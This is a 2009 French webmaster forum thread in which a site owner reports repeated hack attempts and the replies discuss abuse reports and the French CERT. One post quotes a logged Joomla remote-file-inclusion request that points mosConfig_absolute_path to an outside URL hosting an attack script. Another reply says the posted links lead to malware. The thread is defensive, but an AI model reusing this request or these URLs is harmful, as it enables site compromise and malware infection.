Tentative de Hack !
8 messages
• Page 1 sur 1
Consultez la formation Droit et Internet de WebRankInfo / Ranking Metrics
-
bilos - WRInaute impliqué
- Messages: 946
- Inscription: 11 Oct 2005
Tentative de Hack !
le Sam Juin 27, 2009 17:01
Salut à tous 
Méfiez vous de l'adresse ip suivante : ip : [modéré OTP]
C'est un pirate qui ne cesse pas de réaliser des tentatives de hack en XSS
Voila le fichier qu'il teste avec -http://www.j-vision.co.kr/company/hotel/index.php/bo.do
Pour ma part je l'ai eu
J'ai sécurisé les paramètres qui peuvent passer des intrusions et j'ai placé un piège "alerte email ==> adresse ip , page en question et URL saisie pour pirater le code .
Voilà ce que je viens de recevoir :
C'est la réécriture des URLs qui m'a sauvé il croit que j'utilise joomla 
P.S: Je le trouve encore dans une liste noire -http://www.maran.pamil-visions.com/maranxssfilter.php
L'adresse ip est elle un moyen justificatif, si c'est le cas est ce que le log file d'un serveur est tenu en compte ?
Merci pour votre attention
Méfiez vous de l'adresse ip suivante : ip : [modéré OTP]
C'est un pirate qui ne cesse pas de réaliser des tentatives de hack en XSS
Voila le fichier qu'il teste avec -http://www.j-vision.co.kr/company/hotel/index.php/bo.do
Pour ma part je l'ai eu
J'ai sécurisé les paramètres qui peuvent passer des intrusions et j'ai placé un piège "alerte email ==> adresse ip , page en question et URL saisie pour pirater le code .
Voilà ce que je viens de recevoir :
- Code: Tout sélectionner
ip : [modéré OTP] sur la page /fr/.../index.php?option=com_noah&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do???
C'est la réécriture des URLs qui m'a sauvé
il croit que j'utilise joomla P.S: Je le trouve encore dans une liste noire
-http://www.maran.pamil-visions.com/maranxssfilter.phpL'adresse ip est elle un moyen justificatif, si c'est le cas est ce que le log file d'un serveur est tenu en compte ?
Merci pour votre attention
-
biddybulle - WRInaute passionné
- Messages: 1619
- Inscription: 30 Mai 2005
Re: Tentative de Hack !
le Sam Juin 27, 2009 19:31
Pour avoir été la cible d'un hack bien dissimulé. Je servais de relais également pour envoyer sans le savoir des attaques vers des passoires joomla.
Quand c'est en france, tu es prévenu plus facilement par le Centre d'Expertise gouvernemental de Réponse et de Traitement des Attaques informatiques qui indiquent avec grande précision les pages incriminées et te demandes de les supprimer expréssément et de combler tes failles faute de quoi ...
As tu envoyé un Abuse sur l'ip incriminé ?
Quand c'est en france, tu es prévenu plus facilement par le Centre d'Expertise gouvernemental de Réponse et de Traitement des Attaques informatiques qui indiquent avec grande précision les pages incriminées et te demandes de les supprimer expréssément et de combler tes failles faute de quoi ...
As tu envoyé un Abuse sur l'ip incriminé ?
-
bilos - WRInaute impliqué
- Messages: 946
- Inscription: 11 Oct 2005
Re: Tentative de Hack !
le Sam Juin 27, 2009 20:25
Je reçois la même requête sur une autre adresse [modéré OTP]
C'est pas cool !
Je sais bien que j'ai tout sécurisé alors même en cas de dégat mon hébergeur m'offre les backups.
Bon Weekend
C'est pas cool !
Je sais bien que j'ai tout sécurisé alors même en cas de dégat mon hébergeur m'offre les backups.
Bon Weekend
-
Leonick - WRInaute accro
- Messages: 19599
- Inscription: 8 Aoû 2004
Re: Tentative de Hack !
le Jeu Juil 02, 2009 20:19
c'est la nouvelle tendance des spams de referer : le webmaster curieux va cliquer pour savoir qui lui a fait un lien et là, sans antivirus à jour, son pc est vérolébenachem a écrit:tes liens envoient vers des virus, c'est normal ?
8 messages
• Page 1 sur 1
Formation recommandée sur ce thème :
Formation juridique : Droit et Internet : découvrez les risques que vous prenez liés à votre site web, vos conditions générales, vos contrats en ligne, etc. Formation animée par Maître Murielle Cahen, avocate à la Cour de Paris, spécialiste en droit des NTIC.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
- Linkbait et linkbaiting : explications en français - 15-02-2006
- Participez au projet 3x3 ! - 19-07-2004
- Liste des produits et services de Google - 07-12-2005
- Guide d'optimisation d'AdSense pour les éditeurs web - 03-11-2005
- Comment référencer un site Internet : les techniques efficaces - 19-06-2009
Qui est en ligne
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités
Contact
Confidentialité